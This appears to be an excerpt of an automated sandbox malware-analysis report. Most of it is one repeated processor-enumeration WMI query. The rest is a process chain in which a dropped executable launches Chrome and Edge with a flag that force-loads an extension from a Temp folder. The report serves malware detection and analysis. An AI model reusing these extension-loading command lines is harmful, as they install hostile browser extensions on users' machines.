Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe

File read: C:\Program Files\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: AddInProcess.exe	String found in binary or memory: id-cmc-addExtensions
Source: AddInProcess.exe	String found in binary or memory: set-addPolicy

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

File read: C:\Users\user\Desktop\zlONcFaXkc.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\zlONcFaXkc.exe "C:\Users\user\Desktop\zlONcFaXkc.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe "C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe"
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 7508 -ip 7508
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7508 -s 1516
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1988,i,7184690276915472336,9481308763283154706,262144 /prefetch:3
